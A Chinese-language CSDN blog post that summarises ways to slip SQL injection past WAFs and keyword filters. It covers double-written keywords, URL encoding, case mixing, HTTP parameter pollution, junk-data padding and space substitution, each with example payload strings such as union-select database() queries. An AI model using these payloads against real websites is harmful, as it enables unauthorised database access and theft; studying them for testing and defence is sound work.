SQL注入常见绕过简单小结

最新推荐文章于 2024-04-20 12:00:00 发布
最新推荐文章于 2024-04-20 12:00:00 发布
阅读量4.6k 收藏 9
点赞数
分类专栏: WEB安全 文章标签: sql 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54430466/article/details/121952480
版权

文章目录

1. 更改提交方式

?id=1 and 1=2 – + 页面无变化

切换POST方法后,id=1 and 1=2 – + 页面内容消失说明语句成立,可以继续注入!

2. 垃圾数据绕过

and 1=1 – + 错误
And 1=1 – + 错误
And+1=1 错误

一直没数据显示,尝试垃圾数据填充绕过,原理就是相关参数长度超过WAF或者代码预设长度,绕过防御。
例如查看数据库名:
在这里插入图片描述

3. 双写绕过

原理是代码做了关键词过滤替换,输入select经过滤后变为空格或其他
如果输入selselectect,过滤过程selselect ect,最终带入select查询!

?id=-1 union select 1,2,database() 报错,可能存在WAF

id=-1 union seselectlect 1,2,database()
在这里插入图片描述

4. HTTP参数绕过

浏览器在跟服务器进行交互的过程中,浏览器往往会在GET/POST请求里面带上参数,这些参数会以 名称-值 对的形势出现,通常在一个请求中,同样名称的参数只会出现一次。但是在HTTP协议中是允许同样名称的参数出现多次的。比如下面这个链接:http://www.baidu.com?name=aa&name=bb ,针对同样名称的参数出现多次的情况,不同的服务器的处理方式会不一样。有的服务器是取第一个参数,也就是name=aa。有的服务器是取第二个参数,也就是name=bb。有的服务器两个参数都取,也就是name=aa,bb 。这种特性在绕过一些服务器端的逻辑判断时,非常有用。

id=1 and 1=2 false
在这里插入图片描述

id=2&id=1’ – + true
在这里插入图片描述

5. 编码绕过

拦截select
多次编码sleect后即可绕过

id=2 select 在参数后输入sleect报错
在这里插入图片描述

id=2 union %25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34 1,2,3
在这里插入图片描述

6. 大小写绕过

id=1 order by 3 flase

在这里插入图片描述

id=1 orDer by 3 true
在这里插入图片描述

7. 等价函数

id=1 and 1=1 flase
在这里插入图片描述

id=1 && 1=1 true
在这里插入图片描述

8. 其他

1)注释符号绕过在sql中常用的注释符号有:#、/xxx/、
2)大小写绕过当web正则过滤的时候对大小写不敏感的情况下使用,一般很少会有这种漏洞比如当过滤了select的时候我们可以采用SEleCT来查询。
3)内联注释绕过把要使用的查询语句放在/。。。/中,这样在一般的数据库是不会执行的,但是在mysql中内联注释中的语句会被执行。
4)双写关键字绕过
在某一些简单的waf中,将关键字select等只使用replace()函数置换为空,这时候可以使用双写关键字绕过。例如select变成seleselectct,在经过waf的处理之后又变成select,达到绕过的要求。
5)特殊编码绕过
(1)十六进制
(2)ascii编码绕过
Test 等价于CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)tip:好像新版mysql不能用了
6)空格过滤绕过
两个空格代替一个空格,用Tab代替空格,%a0=空格: %09 %0a %0d %a0 /**/最基本的绕过方法,用注释替换空格:/* 注释 */

网络安全练习生
关注
  • 0
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WEB安全渗透测试》(11)SQL注入绕过
午夜安全
10-24 1267
WEB安全渗透测试》(11)SQL注入绕过 当我们访问如下URL的时候,提示“存在非法字”:http://www.tianchi.com/web/rg/1.php?id=1 order by 3可以尝试Order,同理如果其他字必拦截,也可以大小写混合。当我们遇到关键字必过滤的时候,如我们访问如下URL:http://www.tianchi.com/web/rg/1.php?id=1 order by 3...
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
SQL 注入之注释绕过
nihao_ma_的博客
05-07 997
SQL 注入之注释绕过
sql注入(三)绕过方法及防御手段
最新发布
wangluoanquan111的博客
04-20 1137
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
mysql 注释 绕过_sql注入绕过方法
weixin_35437039的博客
01-20 1735
一、注释绕过sql中常用的注释号有--、#、/*xxx*/、二、大小写绕过web正则过滤的时候对大小写不敏感的情况下使用,一般很少会有这种漏洞比如当过滤了select的时候我们可以采用SEleCT来查询三、内联注释绕过把要使用的查询语句放在/*。。。*/中,这样在一般的数据库是不会执行的,但是在mysql中内联注释中的语句会被执行。四、双写关键字绕过有的waf只会对关键词过滤一次,这时候...
sql注释注入防御_【实验】绕过注释过滤
weixin_39637723的博客
12-21 247
渗透测试工程师(CISP-PTE)超值专题(含本课程)SQL注入经过21年的发展,至今为止依然是OWASP 排名最严重的漏洞,可以看出SQL漏洞危害的严重性和持久性,本节课程从以下几个方面来讲解SQL注入。【理论】SQL注入的业务场景以及危害(1、SQL注入起源 2、为什么会有SQL注入 3、SQL注入的业务场景以及危害 4、不同人群对SQL注入的看法)【实验】真实网站中的SQL注入是怎么样的(通...
SQL注入---字绕过
zhoutong2323的博客
04-10 819
当网页源代码中出现如下代码后,常见注释号将无效,因此需要通过特殊手段进行绕过 上述代码中无法使用号(#)或(--+)将后面的sql语句注释,因此需要通过特殊手段将后面多出的单引号闭合演示案例: 二.and 和 or 过滤绕过 过滤源代码 绕过手法 三.空格过滤绕过 过滤代码: 绕过手法: 在不同的环境中能够绕过的URL编码有所不同,因此需要多次尝试。演示案例:未使用URL编码注入前:号被过滤 使用URL注入编码后 报错注入:
SQL注入绕过 单引号 限制继续注入
01-02
包括我写的那篇《SQL Injection的实现与应用》也是这样的例子,因为没有碰到任何的过滤,所以使我们相当轻松就注入成功了,如下: 代码如下: //www.jb51.net/show.asp?id=1;exec master.dbo.xp_cmdshell ...
SQL注入绕WAF小结
05-08
自己总结SQL注入绕WAF小结,有人能指点指点就更好啦。。
关于SQL注入绕过的一些知识点
09-09
网上关于SQL注入绕过技巧有很多,最近正好空下来,想着整理下关于SQL注入绕过的一些姿势。欢迎大牛补充,下面这篇文章主要介绍了关于SQL注入绕过的一些知识点,总结的还是相对比较全面的,需要的朋友可以参考下。
SQL注入技巧之显注与盲注中过滤逗号绕过详析
09-09
SQL注入绕过技巧有很多,下面这篇文章主要给大家介绍了关于SQL注入技巧之显注与盲注中过滤逗号绕过的相关资料,文中通过示例代码介绍的非常详细,需要的朋友们下面随着小编来一起学习学习吧
渗透之——SQL注入绕过技术总结
冰河的专栏
01-05 4621
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/85869703 1.绕过空格(注释/* */,%a0) 两个空格代替一个空格,用Tab代替空格,%a0=空格: %20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!*/ 最基本的绕过方法,用注释替换空格: /* 注释 */ 使用...
安全】P 2-15 绕过去除注释SQL注入
Z_David_Z的博客
02-14 259
目录0X01 MySQL中的注释0X02 去除注释的代码分析0X03 绕过去除注释SQL注入0X04 sqlmap安全检测 0X01 MySQL中的注释 注释的作用:用于标记某段代码的作用,起到对代码功能的说明作用。但是注释掉的内容不会被执行。 Mysql中的注释: 1、单行注释: --+ 或 --空格 或 # 2、多行注释: /* 多行注释内容 */ 对于正常的SQL语句中,注释起到说明作用的功能。但是对于在利用SQL注入漏洞过程中,注释起到闭合 单引号、多单引号、双引号、单括号、多
sql注入各种绕过
weixin_42478365的博客
08-01 7811
sql注入绕过
SQL注入实战:绕过操作
ting_liang的博客
01-27 1768
preg replace(mixed $pattern, mixed $replacement, mixed$subject):执行-个正则表达式的搜索和替换。id=1 && 1=1或者?可以利用网络中的开源的URL在线编码,绕过SQL注入的过滤机制。1、大小写变形,Or,OR,oR,And,ANd,aND等-代码中大小写不敏感都剔除。3、利用号代替--and --&& --or--|| 等。5、网站的每个数据层的编码统一,建议全部使用utf-8编码。
7-Web安全——SQL注入WAF绕过注释
网络安全
05-31 4780
SQL注入过程中注释号有以下几种表达方式: -- # %23 SQL注入过程中注释号的作用是把后面不需要的语句注释掉,以保证SQL命令的完整性。 以Less-1为例,分析源代码: $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 在进行注入时,输入?id=1,参数传入到后台中输入的值1会替换$id,源代码中闭合值就是这样的: $sql="SELECT * FROM users WHERE id='1'...
Web安全sql注入绕过技法
likinguuu的博客
11-25 1169
Web安全sql注入绕过技法
常见sql注入绕过方法
carmi的博客
01-17 2671
常见sql注入绕过方法 目录常见sql注入绕过方法1、空格过滤绕过漏洞代码示例/**/绕过制表绕过换行绕过括号绕过`反引号绕过2、内联注释绕过常见waf!!!】3、大小写绕过4、双写关键字绕过5、编码绕过漏洞示例代码双重URL编码绕过十六进制编码绕过Unicode编码绕过ASCII编码绕过6、等价函数字替换绕过漏洞示例代码用like或in代替=逗号过滤等价函数7、逻辑号替换8、宽字节绕...
深入了解SQL注入绕过waf和过滤机制
02-11
深入理解SQL注入绕过Web应用防火墙(WAF)和过滤机制是一门关键的技能,尤其是在IT安全领域。WAF是一种网络安全系统,旨在检测并阻止恶意攻击,尤其是针对Web应用程序的攻击,如SQL注入。本文将带你探讨以下几个关键...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值